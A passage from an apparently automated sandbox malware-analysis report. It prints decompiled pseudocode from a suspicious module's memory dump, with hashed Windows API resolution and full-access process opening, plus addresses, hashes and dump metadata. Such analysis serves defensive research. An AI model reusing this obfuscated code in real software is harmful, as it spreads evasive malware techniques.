				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v140, E6E9EF4F0(_t353) + 0x10);
				E6E9EF4E0( &_v144, E6E9EF4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v148, E6E9EF4F0(_t357) + 0x10);
				E6E9EF4E0( &_v152, E6E9EF4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v156, E6E9EF4F0(_t361) + 0x10);
				E6E9EF4E0( &_v160, E6E9EF4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v164, E6E9EF4F0(_t365) + 0x10);
				E6E9EF4E0( &_v168, E6E9EF4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v172, E6E9EF4F0(_t369) + 0x10);
				E6E9EF4E0( &_v176, E6E9EF4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v180, E6E9EF4F0(_t373) + 0x10);
				E6E9EF4E0( &_v184, E6E9EF4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v188, E6E9EF4F0(_t377) + 0x10);
				E6E9EF4E0( &_v192, E6E9EF4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v196, E6E9EF4F0(_t381) + 0x10);
				E6E9EF4E0( &_v200, E6E9EF4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v204, E6E9EF4F0(_t385) + 0x10);
				E6E9EF4E0( &_v208, E6E9EF4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E9F41D8(0xfe338407, _t434);
				E6E9EF4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E9EF4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E9EF4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E9EF4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E9EF4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E9EF4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E9EF4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E9EF4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E9EF4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E9EF4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E9EF4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E9EF4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E9EF4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E9EF4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E9EF4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E9EF4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E9EF4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E9E1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E9EB2C0( &_v248, _v256, _t481, _v252, _t318);
				E6E9EF864( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v296, E6E9EF4F0(_t410) + 0x10);
				E6E9EF4E0( &_v300, E6E9EF4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v304, E6E9EF4F0(_t414) + 0x10);
				E6E9EF4E0( &_v308, E6E9EF4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v312, E6E9EF4F0(_t418) + 0x10);
				E6E9EF4E0( &_v316, E6E9EF4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v320, E6E9EF4F0(_t422) + 0x10);
				E6E9EF4E0( &_v324, E6E9EF4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E9EBA40(_t154,  *_t480);
				E6E9EF4E0( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E9EF4E0( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E9EF4E0( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E9EF4E0( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E9EF678( &_v316);
				return E6E9EF678( &_v356);
			}

0x6e9e1494
0x6e9e1498
0x6e9e149d
0x6e9e14a3
0x6e9e14ab
0x6e9e14b0
0x6e9e14bc
0x6e9e14c0
0x6e9e14d2
0x6e9e14e8
0x6e9e14f3
0x6e9e14f4
0x6e9e14f5
0x6e9e14f6
0x6e9e14f7
0x6e9e14fa
0x6e9e14fe
0x6e9e1502
0x6e9e1509
0x6e9e151b
0x6e9e1531
0x6e9e153c
0x6e9e153d
0x6e9e153e
0x6e9e153f
0x6e9e1540
0x6e9e1543
0x6e9e1547
0x6e9e154b
0x6e9e1552
0x6e9e1564
0x6e9e157a
0x6e9e1585
0x6e9e1586
0x6e9e1587
0x6e9e1588
0x6e9e1589
0x6e9e158c
0x6e9e1590
0x6e9e1594
0x6e9e159b
0x6e9e15ad
0x6e9e15c3
0x6e9e15ce
0x6e9e15cf
0x6e9e15d0
0x6e9e15d1
0x6e9e15d2
0x6e9e15d5
0x6e9e15d9
0x6e9e15dd
0x6e9e15e4
0x6e9e15f6
0x6e9e160c
0x6e9e1617
0x6e9e1618
0x6e9e1619
0x6e9e161a
0x6e9e161b
0x6e9e161e
0x6e9e1622
0x6e9e1626
0x6e9e162d
0x6e9e163f
0x6e9e1655
0x6e9e1660
0x6e9e1661
0x6e9e1662
0x6e9e1663
0x6e9e1664
0x6e9e1667
0x6e9e166b
0x6e9e166f
0x6e9e1676
0x6e9e1688
0x6e9e169e
0x6e9e16a9
0x6e9e16aa
0x6e9e16ab
0x6e9e16ac
0x6e9e16ad
0x6e9e16b0
0x6e9e16b4
0x6e9e16b8
0x6e9e16bf
0x6e9e16d1
0x6e9e16e7
0x6e9e16f2
0x6e9e16f3
0x6e9e16f4
0x6e9e16f5
0x6e9e16f6
0x6e9e16f9
0x6e9e16fd
0x6e9e1701
0x6e9e1708
0x6e9e171a
0x6e9e1730
0x6e9e173b
0x6e9e173c
0x6e9e173d
0x6e9e173e
0x6e9e173f
0x6e9e1742
0x6e9e1746
0x6e9e174a
0x6e9e1751
0x6e9e1763
0x6e9e1779
0x6e9e1784
0x6e9e1785
0x6e9e1786
0x6e9e1787
0x6e9e1788
0x6e9e178b
0x6e9e178f
0x6e9e1793
0x6e9e179a
0x6e9e17ac
0x6e9e17c2
0x6e9e17cd
0x6e9e17ce
0x6e9e17cf
0x6e9e17d0
0x6e9e17d1
0x6e9e17d4
0x6e9e17d8
0x6e9e17dc
0x6e9e17e3
0x6e9e17f5
0x6e9e180b
0x6e9e1816
0x6e9e1817
0x6e9e1818
0x6e9e1819
0x6e9e181a
0x6e9e181d
0x6e9e1821
0x6e9e1825
0x6e9e182c
0x6e9e183e
0x6e9e1854
0x6e9e185f
0x6e9e1860
0x6e9e1861
0x6e9e1862
0x6e9e1863
0x6e9e1866
0x6e9e186a
0x6e9e186e
0x6e9e1875
0x6e9e1887
0x6e9e189d
0x6e9e18a8
0x6e9e18a9
0x6e9e18aa
0x6e9e18ab
0x6e9e18ac
0x6e9e18af
0x6e9e18b3
0x6e9e18b7
0x6e9e18be
0x6e9e18d0
0x6e9e18e6
0x6e9e18f1
0x6e9e18f2
0x6e9e18f3
0x6e9e18f4
0x6e9e18f5
0x6e9e18f8
0x6e9e18fc
0x6e9e1900
0x6e9e1907
0x6e9e1919
0x6e9e192f
0x6e9e193a
0x6e9e193b
0x6e9e193c
0x6e9e193d
0x6e9e193e
0x6e9e1941
0x6e9e1945
0x6e9e1949
0x6e9e1950
0x6e9e1962
0x6e9e1978
0x6e9e1983
0x6e9e1984
0x6e9e1985
0x6e9e1986
0x6e9e198c
0x6e9e198f
0x6e9e1991
0x6e9e199c
0x6e9e19a3
0x6e9e19ac
0x6e9e19b4
0x6e9e19bb
0x6e9e19c4
0x6e9e19cc
0x6e9e19d3
0x6e9e19dc
0x6e9e19e4
0x6e9e19eb
0x6e9e19f4
0x6e9e19fc
0x6e9e1a03
0x6e9e1a0c
0x6e9e1a14
0x6e9e1a1b
0x6e9e1a24
0x6e9e1a2c
0x6e9e1a36
0x6e9e1a3f
0x6e9e1a47
0x6e9e1a51
0x6e9e1a5a
0x6e9e1a62
0x6e9e1a6c
0x6e9e1a75
0x6e9e1a7d
0x6e9e1a87
0x6e9e1a90
0x6e9e1a98
0x6e9e1aa2
0x6e9e1aab
0x6e9e1ab3
0x6e9e1abd
0x6e9e1ac6
0x6e9e1ace
0x6e9e1ad8
0x6e9e1ae1
0x6e9e1ae9
0x6e9e1af3
0x6e9e1afc
0x6e9e1b04
0x6e9e1b0e
0x6e9e1b17
0x6e9e1b1f
0x6e9e1b26
0x6e9e1b2f
0x6e9e1b37
0x6e9e1b3e
0x6e9e1b43
0x6e9e1b51
0x6e9e1b55
0x6e9e1b64
0x6e9e1b6d
0x6e9e1b72
0x6e9e1b79
0x6e9e1b7d
0x6e9e1b81
0x6e9e1b88
0x6e9e1b9a
0x6e9e1bb0
0x6e9e1bbb
0x6e9e1bbc
0x6e9e1bbd
0x6e9e1bbe
0x6e9e1bbf
0x6e9e1bc2
0x6e9e1bc6
0x6e9e1bca
0x6e9e1bd1
0x6e9e1be3
0x6e9e1bf9
0x6e9e1c04
0x6e9e1c05
0x6e9e1c06
0x6e9e1c07
0x6e9e1c08
0x6e9e1c0b
0x6e9e1c0f
0x6e9e1c13
0x6e9e1c1a
0x6e9e1c2c
0x6e9e1c42
0x6e9e1c4d
0x6e9e1c4e
0x6e9e1c4f
0x6e9e1c50
0x6e9e1c51
0x6e9e1c54
0x6e9e1c58
0x6e9e1c5c
0x6e9e1c63
0x6e9e1c75
0x6e9e1c8b
0x6e9e1c96
0x6e9e1c97
0x6e9e1c98
0x6e9e1c99
0x6e9e1c9a
0x6e9e1c9d
0x6e9e1ca0
0x6e9e1ca1
0x6e9e1ca2
0x6e9e1ca9
0x6e9e1cac
0x6e9e1cb7
0x6e9e1cbe
0x6e9e1cc7
0x6e9e1ccf
0x6e9e1cd6
0x6e9e1cdf
0x6e9e1ce7
0x6e9e1cee
0x6e9e1cf7
0x6e9e1cff
0x6e9e1d04
0x6e9e1d0d
0x6e9e1d15
0x6e9e1d2a

Strings

g , xrefs: 6E9E17DC

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction ID: dfb77834bf51d5e4636a01eddceed31d704f66066794279c2007104875d1532c
Opcode Fuzzy Hash: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction Fuzzy Hash: C132B5724047059AC717DF64D851AEFB3A8AFF130CF204B1EB5895A2A1FF71E985CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EA52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E9EA52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E9EB69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E9EF4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E9EF678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E9F223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E9EF678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E9EF5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E9EF5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e9fb808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E9F303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E9EB608(_t439 + 0x34);
											E6E9EB608(_t439 + 8);
											goto L65;
										}
										L62:
										E6E9EB608(_t439 + 0x34);
										E6E9EB608(_t439 + 8);
										goto L63;
									}
									_t392 = E6E9EF4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E9ECAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E9EC2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E9EF84C(_t439 + 0x14, E6E9EF4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E9EF4E0(_t439 + 0x14, E6E9EF4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E9F303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E9EF84C(_t439 + 0x40, E6E9EF4F0(_t439 + 0x3c) + 4);
											 *(E6E9EF4E0(_t439 + 0x40, E6E9EF4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E9ECD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E9EF4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E9EAC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E9ECD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E9EF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E9EF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E9F38C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E9EF84C( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E9EF4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E9EF4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E9F38C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E9EF4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E9EF84C( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E9EF84C( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E9EF84C( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 4);
								 *(E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E9EF4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E9F303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E9EF4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E9EF84C( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E9EF4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E6E9EF84C( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 4);
										 *(E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E9EF4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E9EF4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E9F38C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E9EF4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E9EF84C( *((intOrPtr*)(_t439 + 4)), E6E9EF4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E9F303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E9EF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E9EF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E9EF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
